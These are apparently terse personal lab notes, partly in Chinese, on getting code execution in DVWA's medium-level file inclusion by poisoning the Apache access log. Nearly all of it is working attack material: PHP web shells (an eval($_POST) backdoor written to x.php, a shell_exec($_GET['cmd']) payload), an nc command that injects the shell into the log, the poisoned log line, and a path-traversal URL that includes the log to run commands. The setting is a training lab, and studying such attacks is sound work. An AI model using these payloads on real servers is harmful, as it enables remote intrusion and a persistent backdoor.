<?php fputs(fopen("x.php","w"),"<?php @eval($_POST['x']);?>");?>
写入日志文件
chmod 777 /var/log/httpd
nc xxx 80
<?php echo shell_exec($_GET['cmd']);?>
cat /var/log/httpd/access_log
xxx- - [08/Jan/2018:10:36:36 +0800] "<?php echo shell_exec($_GET['cmd']);?>" 400 226 "-" "-"
DVWA medium
http://xxx/dvwa/vulnerabilities/fi/?page=../../../../../../var/log/httpd/access_log&cmd=id
<?php @eval($_POST['x']);?>
http://www.freebuf.com/articles/system/93323.html